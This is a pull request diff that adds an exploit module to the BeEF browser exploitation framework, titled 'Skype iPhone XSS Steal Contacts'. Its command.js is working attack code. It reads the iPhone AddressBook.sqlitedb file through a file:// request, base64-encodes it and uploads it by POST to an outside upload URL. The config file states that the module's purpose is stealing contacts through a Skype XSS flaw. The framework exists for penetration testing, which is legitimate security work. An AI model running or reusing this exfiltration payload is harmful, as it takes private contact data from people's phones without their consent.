Merge pull request #1185 from beefproject/SkypeXSS

Skype xss

modules/exploits/skype_xss/command.js

@@ -0,0 +1,46 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	x = new XMLHttpRequest;
+	x.open("get","file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb");
+	x.overrideMimeType("text/plain; charset=x-user-defined");
+	x.send();
+		
+	x.onreadystatechange = function() {
+		if(x.readyState == 4){
+			a = x.responseText || "";
+			ff=[];
+			mx=a.length;
+			scc = String.fromCharCode;
+		}		
+		for(var z = 0 ; z < mx ; z++){
+			ff[z] = scc(a.charCodeAt(z)&255);
+		}
+		
+		b=ff.join("");
+		b=btoa(b);
+		xp = new XMLHttpRequest;
+		xp.open("post","http://example.com/upload.php",!0);
+		xp.setRequestHeader("Content-Type","multipart/form-data;boundary=xxx,");
+		a = "--xxx\r\nContent-Disposition:form-data;name=\"media\";filename=\"ios.sqlitedb\"\r\nContent-Type:application/octet-stream\r\n\r\n"+b+"\r\n--xxx--";
+		xp.send(a);
+	};
+	
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'SQL file sent');
+
+});
+

modules/exploits/skype_xss/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        skype_xss:
+            enable: true
+            category: "Exploits"
+            name: "Skykpe iPhone XSS Steal Contacts"
+            description: "This module will steal iPhone contacts using a Skype XSS vuln."
+            authors: ["saafan"]
+            target:
+                working: ["ALL"]

modules/exploits/skype_xss/module.rb

@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_cookie < BeEF::Core::Command
+
+  def post_execute
+  
+	##Stub##
+	
+	
+    save({'result' => @datastore['result']})
+  end
+
+end